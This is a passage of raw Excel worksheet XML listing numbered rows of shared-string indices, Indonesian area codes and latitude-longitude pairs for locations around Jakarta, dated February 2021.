      <c r="R3196" t="s">
        <v>484</v>
      </c>
      <c r="S3196" t="s">
        <v>108</v>
      </c>
      <c r="T3196" t="s">
        <v>33</v>
      </c>
      <c r="U3196" s="5">
        <v>10682790</v>
      </c>
      <c r="V3196" s="5" t="s">
        <v>17326</v>
      </c>
      <c r="W3196" s="5">
        <v>-628670</v>
      </c>
      <c r="X3196" t="s">
        <v>21064</v>
      </c>
      <c r="Y3196" t="str">
        <f t="shared" si="49"/>
        <v>-6.28670,106.82790</v>
      </c>
    </row>
    <row r="3197" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3197">
        <v>258416</v>
      </c>
      <c r="B3197" s="1">
        <v>44246</v>
      </c>
      <c r="C3197" s="2">
        <v>0.95026620370370374</v>
      </c>
      <c r="D3197" t="s">
        <v>22</v>
      </c>
      <c r="E3197" t="s">
        <v>23</v>
      </c>
      <c r="F3197" t="s">
        <v>10713</v>
      </c>
      <c r="G3197" t="s">
        <v>10714</v>
      </c>
      <c r="H3197" t="s">
        <v>26</v>
      </c>
      <c r="I3197" t="s">
        <v>2134</v>
      </c>
      <c r="J3197" t="s">
        <v>2627</v>
      </c>
      <c r="L3197" t="s">
        <v>10715</v>
      </c>
      <c r="M3197">
        <v>3275012002</v>
      </c>
      <c r="N3197">
        <v>3275012</v>
      </c>
      <c r="O3197">
        <v>3275</v>
      </c>
      <c r="P3197">
        <v>32</v>
      </c>
      <c r="Q3197" t="s">
        <v>4208</v>
      </c>
      <c r="R3197" t="s">
        <v>4089</v>
      </c>
      <c r="S3197" t="s">
        <v>41</v>
      </c>
      <c r="T3197" t="s">
        <v>42</v>
      </c>
      <c r="U3197" s="5">
        <v>10693970</v>
      </c>
      <c r="V3197" s="5" t="s">
        <v>17327</v>
      </c>
      <c r="W3197" s="5">
        <v>-631868</v>
      </c>
      <c r="X3197" t="s">
        <v>21065</v>
      </c>
      <c r="Y3197" t="str">
        <f t="shared" si="49"/>
        <v>-6.31868,106.93970</v>
      </c>
    </row>
    <row r="3198" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3198">
        <v>258417</v>
      </c>
      <c r="B3198" s="1">
        <v>44246</v>
      </c>
      <c r="C3198" s="2">
        <v>0.95197916666666671</v>
      </c>
      <c r="D3198" t="s">
        <v>22</v>
      </c>
      <c r="E3198" t="s">
        <v>23</v>
      </c>
      <c r="F3198" t="s">
        <v>10716</v>
      </c>
      <c r="H3198" t="s">
        <v>26</v>
      </c>
      <c r="I3198" t="s">
        <v>1953</v>
      </c>
      <c r="J3198" t="s">
        <v>10717</v>
      </c>
      <c r="L3198" t="s">
        <v>10718</v>
      </c>
      <c r="M3198">
        <v>3171100002</v>
      </c>
      <c r="N3198">
        <v>3171100</v>
      </c>
      <c r="O3198">
        <v>3171</v>
      </c>
      <c r="P3198">
        <v>31</v>
      </c>
      <c r="Q3198" t="s">
        <v>1870</v>
      </c>
      <c r="R3198" t="s">
        <v>107</v>
      </c>
      <c r="S3198" t="s">
        <v>108</v>
      </c>
      <c r="T3198" t="s">
        <v>33</v>
      </c>
      <c r="U3198" s="5">
        <v>10682254</v>
      </c>
      <c r="V3198" s="5" t="s">
        <v>15923</v>
      </c>
      <c r="W3198" s="5">
        <v>-622938</v>
      </c>
      <c r="X3198" t="s">
        <v>21066</v>
      </c>
      <c r="Y3198" t="str">
        <f t="shared" si="49"/>
        <v>-6.22938,106.82254</v>
      </c>
    </row>
    <row r="3199" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3199">
        <v>258418</v>
      </c>
      <c r="B3199" s="1">
        <v>44246</v>
      </c>
      <c r="C3199" s="2">
        <v>0.95240740740740737</v>
      </c>
      <c r="D3199" t="s">
        <v>22</v>
      </c>
      <c r="E3199" t="s">
        <v>23</v>
      </c>
      <c r="F3199" t="s">
        <v>10719</v>
      </c>
      <c r="H3199" t="s">
        <v>26</v>
      </c>
      <c r="I3199" t="s">
        <v>383</v>
      </c>
      <c r="J3199" t="s">
        <v>2627</v>
      </c>
      <c r="L3199" t="s">
        <v>10720</v>
      </c>
      <c r="M3199">
        <v>3216021007</v>
      </c>
      <c r="N3199">
        <v>3216021</v>
      </c>
      <c r="O3199">
        <v>3216</v>
      </c>
      <c r="P3199">
        <v>32</v>
      </c>
      <c r="Q3199" t="s">
        <v>7032</v>
      </c>
      <c r="R3199" t="s">
        <v>10721</v>
      </c>
      <c r="S3199" t="s">
        <v>41</v>
      </c>
      <c r="T3199" t="s">
        <v>42</v>
      </c>
      <c r="U3199" s="5">
        <v>10711149</v>
      </c>
      <c r="V3199" s="5" t="s">
        <v>17328</v>
      </c>
      <c r="W3199" s="5">
        <v>-638208</v>
      </c>
      <c r="X3199" t="s">
        <v>21067</v>
      </c>
      <c r="Y3199" t="str">
        <f t="shared" si="49"/>
        <v>-6.38208,107.11149</v>
      </c>
    </row>
    <row r="3200" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3200">
        <v>258425</v>
      </c>
      <c r="B3200" s="1">
        <v>44246</v>
      </c>
      <c r="C3200" s="2">
        <v>0.93888888888888899</v>
      </c>
      <c r="D3200" t="s">
        <v>2648</v>
      </c>
      <c r="E3200" t="s">
        <v>23</v>
      </c>
      <c r="G3200" t="s">
        <v>10722</v>
      </c>
      <c r="H3200" t="s">
        <v>26</v>
      </c>
      <c r="J3200" t="s">
        <v>10629</v>
      </c>
      <c r="L3200" t="s">
        <v>10723</v>
      </c>
      <c r="M3200">
        <v>3172020001</v>
      </c>
      <c r="N3200">
        <v>3172020</v>
      </c>
      <c r="O3200">
        <v>3172</v>
      </c>
      <c r="P3200">
        <v>31</v>
      </c>
      <c r="Q3200" t="s">
        <v>7796</v>
      </c>
      <c r="R3200" t="s">
        <v>1644</v>
      </c>
      <c r="S3200" t="s">
        <v>49</v>
      </c>
      <c r="T3200" t="s">
        <v>33</v>
      </c>
      <c r="U3200" s="5">
        <v>10687056</v>
      </c>
      <c r="V3200" s="5" t="s">
        <v>17329</v>
      </c>
      <c r="W3200" s="5">
        <v>-634854</v>
      </c>
      <c r="X3200" t="s">
        <v>21068</v>
      </c>
      <c r="Y3200" t="str">
        <f t="shared" si="49"/>
        <v>-6.34854,106.87056</v>
      </c>
    </row>
    <row r="3201" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3201">
        <v>258440</v>
      </c>
      <c r="B3201" s="1">
        <v>44246</v>
      </c>
      <c r="C3201" s="2">
        <v>0.95256944444444447</v>
      </c>
      <c r="D3201" t="s">
        <v>22</v>
      </c>
      <c r="E3201" t="s">
        <v>23</v>
      </c>
      <c r="F3201" t="s">
        <v>10724</v>
      </c>
      <c r="G3201" t="s">
        <v>10725</v>
      </c>
      <c r="H3201" t="s">
        <v>26</v>
      </c>
      <c r="I3201" t="s">
        <v>383</v>
      </c>
      <c r="J3201" t="s">
        <v>3135</v>
      </c>
      <c r="M3201">
        <v>3674060003</v>
      </c>
      <c r="N3201">
        <v>3674060</v>
      </c>
      <c r="O3201">
        <v>3674</v>
      </c>
      <c r="P3201">
        <v>36</v>
      </c>
      <c r="Q3201" t="s">
        <v>205</v>
      </c>
      <c r="R3201" t="s">
        <v>169</v>
      </c>
      <c r="S3201" t="s">
        <v>170</v>
      </c>
      <c r="T3201" t="s">
        <v>171</v>
      </c>
      <c r="U3201" s="5">
        <v>10669248</v>
      </c>
      <c r="V3201" s="5" t="s">
        <v>17330</v>
      </c>
      <c r="W3201" s="5">
        <v>-624956</v>
      </c>
      <c r="X3201" t="s">
        <v>21069</v>
      </c>
      <c r="Y3201" t="str">
        <f t="shared" si="49"/>
        <v>-6.24956,106.69248</v>
      </c>
    </row>
    <row r="3202" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3202">
        <v>258441</v>
      </c>
      <c r="B3202" s="1">
        <v>44246</v>
      </c>
      <c r="C3202" s="2">
        <v>0.95275462962962953</v>
      </c>
      <c r="D3202" t="s">
        <v>22</v>
      </c>
      <c r="E3202" t="s">
        <v>23</v>
      </c>
      <c r="F3202" t="s">
        <v>10726</v>
      </c>
      <c r="H3202" t="s">
        <v>26</v>
      </c>
      <c r="I3202" t="s">
        <v>1971</v>
      </c>
      <c r="J3202" t="s">
        <v>10717</v>
      </c>
      <c r="L3202" t="s">
        <v>10727</v>
      </c>
      <c r="M3202">
        <v>3171100002</v>
      </c>
      <c r="N3202">
        <v>3171100</v>
      </c>
      <c r="O3202">
        <v>3171</v>
      </c>
      <c r="P3202">
        <v>31</v>
      </c>
      <c r="Q3202" t="s">
        <v>1870</v>
      </c>
      <c r="R3202" t="s">
        <v>107</v>
      </c>
      <c r="S3202" t="s">
        <v>108</v>
      </c>
      <c r="T3202" t="s">
        <v>33</v>
      </c>
      <c r="U3202" s="5">
        <v>10682255</v>
      </c>
      <c r="V3202" s="5" t="s">
        <v>17331</v>
      </c>
      <c r="W3202" s="5">
        <v>-622925</v>
      </c>
      <c r="X3202" t="s">
        <v>21070</v>
      </c>
      <c r="Y3202" t="str">
        <f t="shared" si="49"/>
        <v>-6.22925,106.82255</v>
      </c>
    </row>
    <row r="3203" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3203">
        <v>258463</v>
      </c>
      <c r="B3203" s="1">
        <v>44246</v>
      </c>
      <c r="C3203" s="2">
        <v>0.95736111111111111</v>
      </c>
      <c r="D3203" t="s">
        <v>22</v>
      </c>
      <c r="E3203" t="s">
        <v>23</v>
      </c>
      <c r="F3203" t="s">
        <v>10728</v>
      </c>
      <c r="G3203" t="s">
        <v>10729</v>
      </c>
      <c r="H3203" t="s">
        <v>26</v>
      </c>
      <c r="I3203" t="s">
        <v>430</v>
      </c>
      <c r="J3203" t="s">
        <v>5026</v>
      </c>
      <c r="L3203" t="s">
        <v>10730</v>
      </c>
      <c r="M3203">
        <v>3171060004</v>
      </c>
      <c r="N3203">
        <v>3171060</v>
      </c>
      <c r="O3203">
        <v>3171</v>
      </c>
      <c r="P3203">
        <v>31</v>
      </c>
      <c r="Q3203" t="s">
        <v>5027</v>
      </c>
      <c r="R3203" t="s">
        <v>1236</v>
      </c>
      <c r="S3203" t="s">
        <v>108</v>
      </c>
      <c r="T3203" t="s">
        <v>33</v>
      </c>
      <c r="U3203" s="5">
        <v>10680998</v>
      </c>
      <c r="V3203" s="5" t="s">
        <v>17332</v>
      </c>
      <c r="W3203" s="5">
        <v>-624710</v>
      </c>
      <c r="X3203" t="s">
        <v>21071</v>
      </c>
      <c r="Y3203" t="str">
        <f t="shared" ref="Y3203:Y3266" si="50">CONCATENATE(X3203,",",V3203)</f>
        <v>-6.24710,106.80998</v>
      </c>
    </row>
    <row r="3204" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3204">
        <v>258464</v>
      </c>
      <c r="B3204" s="1">
        <v>44246</v>
      </c>
      <c r="C3204" s="2">
        <v>0.95878472222222222</v>
      </c>
      <c r="D3204" t="s">
        <v>22</v>
      </c>
      <c r="E3204" t="s">
        <v>23</v>
      </c>
      <c r="F3204" t="s">
        <v>10731</v>
      </c>
      <c r="G3204" t="s">
        <v>10732</v>
      </c>
      <c r="H3204" t="s">
        <v>26</v>
      </c>
      <c r="I3204" t="s">
        <v>2293</v>
      </c>
      <c r="J3204" t="s">
        <v>6602</v>
      </c>
      <c r="L3204" t="s">
        <v>10733</v>
      </c>
      <c r="M3204">
        <v>3172040004</v>
      </c>
      <c r="N3204">
        <v>3172040</v>
      </c>
      <c r="O3204">
        <v>3172</v>
      </c>
      <c r="P3204">
        <v>31</v>
      </c>
      <c r="Q3204" t="s">
        <v>280</v>
      </c>
      <c r="R3204" t="s">
        <v>281</v>
      </c>
      <c r="S3204" t="s">
        <v>49</v>
      </c>
      <c r="T3204" t="s">
        <v>33</v>
      </c>
      <c r="U3204" s="5">
        <v>10688019</v>
      </c>
      <c r="V3204" s="5" t="s">
        <v>17333</v>
      </c>
      <c r="W3204" s="5">
        <v>-626198</v>
      </c>
      <c r="X3204" t="s">
        <v>19342</v>
      </c>
      <c r="Y3204" t="str">
        <f t="shared" si="50"/>
        <v>-6.26198,106.88019</v>
      </c>
    </row>
    <row r="3205" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3205">
        <v>258528</v>
      </c>
      <c r="B3205" s="1">
        <v>44246</v>
      </c>
      <c r="C3205" s="2">
        <v>0.96879629629629627</v>
      </c>
      <c r="D3205" t="s">
        <v>22</v>
      </c>
      <c r="E3205" t="s">
        <v>23</v>
      </c>
      <c r="F3205" t="s">
        <v>10734</v>
      </c>
      <c r="G3205" t="s">
        <v>10735</v>
      </c>
      <c r="H3205" t="s">
        <v>26</v>
      </c>
      <c r="I3205" t="s">
        <v>1891</v>
      </c>
      <c r="J3205" t="s">
        <v>4933</v>
      </c>
      <c r="L3205" t="s">
        <v>10736</v>
      </c>
      <c r="M3205">
        <v>3172030006</v>
      </c>
      <c r="N3205">
        <v>3172030</v>
      </c>
      <c r="O3205">
        <v>3172</v>
      </c>
      <c r="P3205">
        <v>31</v>
      </c>
      <c r="Q3205" t="s">
        <v>462</v>
      </c>
      <c r="R3205" t="s">
        <v>228</v>
      </c>
      <c r="S3205" t="s">
        <v>49</v>
      </c>
      <c r="T3205" t="s">
        <v>33</v>
      </c>
      <c r="U3205" s="5">
        <v>10690059</v>
      </c>
      <c r="V3205" s="5" t="s">
        <v>17334</v>
      </c>
      <c r="W3205" s="5">
        <v>-631793</v>
      </c>
      <c r="X3205" t="s">
        <v>21072</v>
      </c>
      <c r="Y3205" t="str">
        <f t="shared" si="50"/>
        <v>-6.31793,106.90059</v>
      </c>
    </row>
    <row r="3206" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3206">
        <v>258550</v>
      </c>
      <c r="B3206" s="1">
        <v>44246</v>
      </c>
      <c r="C3206" s="2">
        <v>0.9700347222222222</v>
      </c>
      <c r="D3206" t="s">
        <v>22</v>
      </c>
      <c r="E3206" t="s">
        <v>23</v>
      </c>
      <c r="F3206" t="s">
        <v>10737</v>
      </c>
      <c r="G3206" t="s">
        <v>10738</v>
      </c>
      <c r="H3206" t="s">
        <v>26</v>
      </c>
      <c r="I3206" t="s">
        <v>1498</v>
      </c>
      <c r="J3206" t="s">
        <v>3135</v>
      </c>
      <c r="M3206">
        <v>3603051005</v>
      </c>
      <c r="N3206">
        <v>3603051</v>
      </c>
      <c r="O3206">
        <v>3603</v>
      </c>
      <c r="P3206">
        <v>36</v>
      </c>
      <c r="Q3206" t="s">
        <v>3998</v>
      </c>
      <c r="R3206" t="s">
        <v>257</v>
      </c>
      <c r="S3206" t="s">
        <v>201</v>
      </c>
      <c r="T3206" t="s">
        <v>171</v>
      </c>
      <c r="U3206" s="5">
        <v>10659441</v>
      </c>
      <c r="V3206" s="5" t="s">
        <v>17335</v>
      </c>
      <c r="W3206" s="5">
        <v>-621261</v>
      </c>
      <c r="X3206" t="s">
        <v>21073</v>
      </c>
      <c r="Y3206" t="str">
        <f t="shared" si="50"/>
        <v>-6.21261,106.59441</v>
      </c>
    </row>
    <row r="3207" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3207">
        <v>258551</v>
      </c>
      <c r="B3207" s="1">
        <v>44246</v>
      </c>
      <c r="C3207" s="2">
        <v>0.96988425925925925</v>
      </c>
      <c r="D3207" t="s">
        <v>22</v>
      </c>
      <c r="E3207" t="s">
        <v>23</v>
      </c>
      <c r="F3207" t="s">
        <v>10739</v>
      </c>
      <c r="G3207" t="s">
        <v>10740</v>
      </c>
      <c r="H3207" t="s">
        <v>26</v>
      </c>
      <c r="I3207" t="s">
        <v>666</v>
      </c>
      <c r="J3207" t="s">
        <v>10741</v>
      </c>
      <c r="L3207" t="s">
        <v>10742</v>
      </c>
      <c r="M3207">
        <v>3172020001</v>
      </c>
      <c r="N3207">
        <v>3172020</v>
      </c>
      <c r="O3207">
        <v>3172</v>
      </c>
      <c r="P3207">
        <v>31</v>
      </c>
      <c r="Q3207" t="s">
        <v>7796</v>
      </c>
      <c r="R3207" t="s">
        <v>1644</v>
      </c>
      <c r="S3207" t="s">
        <v>49</v>
      </c>
      <c r="T3207" t="s">
        <v>33</v>
      </c>
      <c r="U3207" s="5">
        <v>10687219</v>
      </c>
      <c r="V3207" s="5" t="s">
        <v>17336</v>
      </c>
      <c r="W3207" s="5">
        <v>-634059</v>
      </c>
      <c r="X3207" t="s">
        <v>21074</v>
      </c>
      <c r="Y3207" t="str">
        <f t="shared" si="50"/>
        <v>-6.34059,106.87219</v>
      </c>
    </row>
    <row r="3208" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3208">
        <v>258552</v>
      </c>
      <c r="B3208" s="1">
        <v>44246</v>
      </c>
      <c r="C3208" s="2">
        <v>0.97311342592592587</v>
      </c>
      <c r="D3208" t="s">
        <v>22</v>
      </c>
      <c r="E3208" t="s">
        <v>23</v>
      </c>
      <c r="F3208" t="s">
        <v>10743</v>
      </c>
      <c r="G3208" t="s">
        <v>10744</v>
      </c>
      <c r="H3208" t="s">
        <v>26</v>
      </c>
      <c r="I3208" t="s">
        <v>10745</v>
      </c>
      <c r="J3208" t="s">
        <v>5280</v>
      </c>
      <c r="L3208" t="s">
        <v>10746</v>
      </c>
      <c r="M3208">
        <v>3171060004</v>
      </c>
      <c r="N3208">
        <v>3171060</v>
      </c>
      <c r="O3208">
        <v>3171</v>
      </c>
      <c r="P3208">
        <v>31</v>
      </c>
      <c r="Q3208" t="s">
        <v>5027</v>
      </c>
      <c r="R3208" t="s">
        <v>1236</v>
      </c>
      <c r="S3208" t="s">
        <v>108</v>
      </c>
      <c r="T3208" t="s">
        <v>33</v>
      </c>
      <c r="U3208" s="5">
        <v>10681644</v>
      </c>
      <c r="V3208" s="5" t="s">
        <v>17337</v>
      </c>
      <c r="W3208" s="5">
        <v>-623957</v>
      </c>
      <c r="X3208" t="s">
        <v>21075</v>
      </c>
      <c r="Y3208" t="str">
        <f t="shared" si="50"/>
        <v>-6.23957,106.81644</v>
      </c>
    </row>
    <row r="3209" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3209">
        <v>258574</v>
      </c>
      <c r="B3209" s="1">
        <v>44246</v>
      </c>
      <c r="C3209" s="2">
        <v>0.97344907407407411</v>
      </c>
      <c r="D3209" t="s">
        <v>22</v>
      </c>
      <c r="E3209" t="s">
        <v>23</v>
      </c>
      <c r="F3209" s="3" t="s">
        <v>10747</v>
      </c>
      <c r="H3209" t="s">
        <v>26</v>
      </c>
      <c r="I3209" t="s">
        <v>10748</v>
      </c>
      <c r="J3209" t="s">
        <v>1519</v>
      </c>
      <c r="L3209" t="s">
        <v>10749</v>
      </c>
      <c r="M3209">
        <v>3175010003</v>
      </c>
      <c r="N3209">
        <v>3175010</v>
      </c>
      <c r="O3209">
        <v>3175</v>
      </c>
      <c r="P3209">
        <v>31</v>
      </c>
      <c r="Q3209" t="s">
        <v>545</v>
      </c>
      <c r="R3209" t="s">
        <v>546</v>
      </c>
      <c r="S3209" t="s">
        <v>547</v>
      </c>
      <c r="T3209" t="s">
        <v>33</v>
      </c>
      <c r="U3209" s="5">
        <v>10677695</v>
      </c>
      <c r="V3209" s="5" t="s">
        <v>17338</v>
      </c>
      <c r="W3209" s="5">
        <v>-614031</v>
      </c>
      <c r="X3209" t="s">
        <v>21076</v>
      </c>
      <c r="Y3209" t="str">
        <f t="shared" si="50"/>
        <v>-6.14031,106.77695</v>
      </c>
    </row>
    <row r="3210" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3210">
        <v>258575</v>
      </c>
      <c r="B3210" s="1">
        <v>44246</v>
      </c>
      <c r="C3210" s="2">
        <v>0.97653935185185192</v>
      </c>
      <c r="D3210" t="s">
        <v>22</v>
      </c>
      <c r="E3210" t="s">
        <v>23</v>
      </c>
      <c r="F3210" t="s">
        <v>10750</v>
      </c>
      <c r="G3210" t="s">
        <v>10751</v>
      </c>
      <c r="H3210" t="s">
        <v>26</v>
      </c>
      <c r="I3210" t="s">
        <v>1364</v>
      </c>
      <c r="J3210" t="s">
        <v>3135</v>
      </c>
      <c r="M3210">
        <v>3674060003</v>
      </c>
      <c r="N3210">
        <v>3674060</v>
      </c>
      <c r="O3210">
        <v>3674</v>
      </c>
      <c r="P3210">
        <v>36</v>
      </c>
      <c r="Q3210" t="s">
        <v>205</v>
      </c>
      <c r="R3210" t="s">
        <v>169</v>
      </c>
      <c r="S3210" t="s">
        <v>170</v>
      </c>
      <c r="T3210" t="s">
        <v>171</v>
      </c>
      <c r="U3210" s="5">
        <v>10669336</v>
      </c>
      <c r="V3210" s="5" t="s">
        <v>17339</v>
      </c>
      <c r="W3210" s="5">
        <v>-625019</v>
      </c>
      <c r="X3210" t="s">
        <v>21077</v>
      </c>
      <c r="Y3210" t="str">
        <f t="shared" si="50"/>
        <v>-6.25019,106.69336</v>
      </c>
    </row>
    <row r="3211" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3211">
        <v>258597</v>
      </c>
      <c r="B3211" s="1">
        <v>44246</v>
      </c>
      <c r="C3211" s="2">
        <v>0.97855324074074079</v>
      </c>
      <c r="D3211" t="s">
        <v>22</v>
      </c>
      <c r="E3211" t="s">
        <v>23</v>
      </c>
      <c r="F3211" s="3" t="s">
        <v>10752</v>
      </c>
      <c r="G3211" t="s">
        <v>10753</v>
      </c>
      <c r="H3211" t="s">
        <v>26</v>
      </c>
      <c r="I3211" t="s">
        <v>2139</v>
      </c>
      <c r="J3211" t="s">
        <v>2627</v>
      </c>
      <c r="L3211" t="s">
        <v>10754</v>
      </c>
      <c r="M3211">
        <v>3216081010</v>
      </c>
      <c r="N3211">
        <v>3216081</v>
      </c>
      <c r="O3211">
        <v>3216</v>
      </c>
      <c r="P3211">
        <v>32</v>
      </c>
      <c r="Q3211" t="s">
        <v>6132</v>
      </c>
      <c r="R3211" t="s">
        <v>2512</v>
      </c>
      <c r="S3211" t="s">
        <v>41</v>
      </c>
      <c r="T3211" t="s">
        <v>42</v>
      </c>
      <c r="U3211" s="5">
        <v>10708415</v>
      </c>
      <c r="V3211" s="5" t="s">
        <v>17340</v>
      </c>
      <c r="W3211" s="5">
        <v>-623460</v>
      </c>
      <c r="X3211" t="s">
        <v>21078</v>
      </c>
      <c r="Y3211" t="str">
        <f t="shared" si="50"/>
        <v>-6.23460,107.08415</v>
      </c>
    </row>
    <row r="3212" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3212">
        <v>258598</v>
      </c>
      <c r="B3212" s="1">
        <v>44246</v>
      </c>
      <c r="C3212" s="2">
        <v>0.97949074074074083</v>
      </c>
      <c r="D3212" t="s">
        <v>22</v>
      </c>
      <c r="E3212" t="s">
        <v>23</v>
      </c>
      <c r="F3212" t="s">
        <v>10755</v>
      </c>
      <c r="G3212" t="s">
        <v>10756</v>
      </c>
      <c r="H3212" t="s">
        <v>26</v>
      </c>
      <c r="I3212" t="s">
        <v>3951</v>
      </c>
      <c r="J3212" t="s">
        <v>3135</v>
      </c>
      <c r="L3212" t="s">
        <v>10757</v>
      </c>
      <c r="M3212">
        <v>3674060008</v>
      </c>
      <c r="N3212">
        <v>3674060</v>
      </c>
      <c r="O3212">
        <v>3674</v>
      </c>
      <c r="P3212">
        <v>36</v>
      </c>
      <c r="Q3212" t="s">
        <v>168</v>
      </c>
      <c r="R3212" t="s">
        <v>169</v>
      </c>
      <c r="S3212" t="s">
        <v>170</v>
      </c>
      <c r="T3212" t="s">
        <v>171</v>
      </c>
      <c r="U3212" s="5">
        <v>10672559</v>
      </c>
      <c r="V3212" s="5" t="s">
        <v>17341</v>
      </c>
      <c r="W3212" s="5">
        <v>-625872</v>
      </c>
      <c r="X3212" t="s">
        <v>21079</v>
      </c>
      <c r="Y3212" t="str">
        <f t="shared" si="50"/>
        <v>-6.25872,106.72559</v>
      </c>
    </row>
    <row r="3213" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3213">
        <v>258620</v>
      </c>
      <c r="B3213" s="1">
        <v>44246</v>
      </c>
      <c r="C3213" s="2">
        <v>0.98158564814814808</v>
      </c>
      <c r="D3213" t="s">
        <v>22</v>
      </c>
      <c r="E3213" t="s">
        <v>23</v>
      </c>
      <c r="F3213" t="s">
        <v>10758</v>
      </c>
      <c r="H3213" t="s">
        <v>26</v>
      </c>
      <c r="I3213" t="s">
        <v>137</v>
      </c>
      <c r="J3213" t="s">
        <v>3135</v>
      </c>
      <c r="L3213" t="s">
        <v>10759</v>
      </c>
      <c r="M3213">
        <v>3671021004</v>
      </c>
      <c r="N3213">
        <v>3671021</v>
      </c>
      <c r="O3213">
        <v>3671</v>
      </c>
      <c r="P3213">
        <v>36</v>
      </c>
      <c r="Q3213" t="s">
        <v>10760</v>
      </c>
      <c r="R3213" t="s">
        <v>454</v>
      </c>
      <c r="S3213" t="s">
        <v>201</v>
      </c>
      <c r="T3213" t="s">
        <v>171</v>
      </c>
      <c r="U3213" s="5">
        <v>10666998</v>
      </c>
      <c r="V3213" s="5" t="s">
        <v>17342</v>
      </c>
      <c r="W3213" s="5">
        <v>-622403</v>
      </c>
      <c r="X3213" t="s">
        <v>21080</v>
      </c>
      <c r="Y3213" t="str">
        <f t="shared" si="50"/>
        <v>-6.22403,106.66998</v>
      </c>
    </row>
    <row r="3214" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3214">
        <v>258642</v>
      </c>
      <c r="B3214" s="1">
        <v>44246</v>
      </c>
      <c r="C3214" s="2">
        <v>0.98547453703703702</v>
      </c>
      <c r="D3214" t="s">
        <v>22</v>
      </c>
      <c r="E3214" t="s">
        <v>23</v>
      </c>
      <c r="F3214" t="s">
        <v>10761</v>
      </c>
      <c r="H3214" t="s">
        <v>26</v>
      </c>
      <c r="I3214" t="s">
        <v>3116</v>
      </c>
      <c r="J3214" t="s">
        <v>3327</v>
      </c>
      <c r="L3214" t="s">
        <v>10762</v>
      </c>
      <c r="M3214">
        <v>3172040003</v>
      </c>
      <c r="N3214">
        <v>3172040</v>
      </c>
      <c r="O3214">
        <v>3172</v>
      </c>
      <c r="P3214">
        <v>31</v>
      </c>
      <c r="Q3214" t="s">
        <v>552</v>
      </c>
      <c r="R3214" t="s">
        <v>281</v>
      </c>
      <c r="S3214" t="s">
        <v>49</v>
      </c>
      <c r="T3214" t="s">
        <v>33</v>
      </c>
      <c r="U3214" s="5">
        <v>10687750</v>
      </c>
      <c r="V3214" s="5" t="s">
        <v>17343</v>
      </c>
      <c r="W3214" s="5">
        <v>-625428</v>
      </c>
      <c r="X3214" t="s">
        <v>19961</v>
      </c>
      <c r="Y3214" t="str">
        <f t="shared" si="50"/>
        <v>-6.25428,106.87750</v>
      </c>
    </row>
    <row r="3215" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3215">
        <v>258664</v>
      </c>
      <c r="B3215" s="1">
        <v>44246</v>
      </c>
      <c r="C3215" s="2">
        <v>0.98730324074074083</v>
      </c>
      <c r="D3215" t="s">
        <v>22</v>
      </c>
      <c r="E3215" t="s">
        <v>23</v>
      </c>
      <c r="F3215" t="s">
        <v>10763</v>
      </c>
      <c r="G3215" t="s">
        <v>10764</v>
      </c>
      <c r="H3215" t="s">
        <v>26</v>
      </c>
      <c r="I3215" t="s">
        <v>137</v>
      </c>
      <c r="J3215" t="s">
        <v>10765</v>
      </c>
      <c r="L3215" t="s">
        <v>10766</v>
      </c>
      <c r="M3215">
        <v>3174010006</v>
      </c>
      <c r="N3215">
        <v>3174010</v>
      </c>
      <c r="O3215">
        <v>3174</v>
      </c>
      <c r="P3215">
        <v>31</v>
      </c>
      <c r="Q3215" t="s">
        <v>268</v>
      </c>
      <c r="R3215" t="s">
        <v>69</v>
      </c>
      <c r="S3215" t="s">
        <v>32</v>
      </c>
      <c r="T3215" t="s">
        <v>33</v>
      </c>
      <c r="U3215" s="5">
        <v>10675120</v>
      </c>
      <c r="V3215" s="5" t="s">
        <v>17344</v>
      </c>
      <c r="W3215" s="5">
        <v>-616463</v>
      </c>
      <c r="X3215" t="s">
        <v>21081</v>
      </c>
      <c r="Y3215" t="str">
        <f t="shared" si="50"/>
        <v>-6.16463,106.75120</v>
      </c>
    </row>
    <row r="3216" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3216">
        <v>258665</v>
      </c>
      <c r="B3216" s="1">
        <v>44246</v>
      </c>
      <c r="C3216" s="2">
        <v>0.98837962962962955</v>
      </c>
      <c r="D3216" t="s">
        <v>22</v>
      </c>
      <c r="E3216" t="s">
        <v>23</v>
      </c>
      <c r="F3216" s="3" t="s">
        <v>10767</v>
      </c>
      <c r="H3216" t="s">
        <v>26</v>
      </c>
      <c r="I3216" t="s">
        <v>9045</v>
      </c>
      <c r="J3216" t="s">
        <v>3135</v>
      </c>
      <c r="L3216" t="s">
        <v>10768</v>
      </c>
      <c r="M3216">
        <v>3674060003</v>
      </c>
      <c r="N3216">
        <v>3674060</v>
      </c>
      <c r="O3216">
        <v>3674</v>
      </c>
      <c r="P3216">
        <v>36</v>
      </c>
      <c r="Q3216" t="s">
        <v>205</v>
      </c>
      <c r="R3216" t="s">
        <v>169</v>
      </c>
      <c r="S3216" t="s">
        <v>170</v>
      </c>
      <c r="T3216" t="s">
        <v>171</v>
      </c>
      <c r="U3216" s="5">
        <v>10669317</v>
      </c>
      <c r="V3216" s="5" t="s">
        <v>17345</v>
      </c>
      <c r="W3216" s="5">
        <v>-624576</v>
      </c>
      <c r="X3216" t="s">
        <v>21082</v>
      </c>
      <c r="Y3216" t="str">
        <f t="shared" si="50"/>
        <v>-6.24576,106.69317</v>
      </c>
    </row>
    <row r="3217" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A3217">
        <v>258680</v>
      </c>
      <c r="B3217" s="1">
        <v>44246</v>
      </c>
      <c r="C3217" s="2">
        <v>0.98749999999999993</v>
      </c>
      <c r="D3217" t="s">
        <v>2648</v>
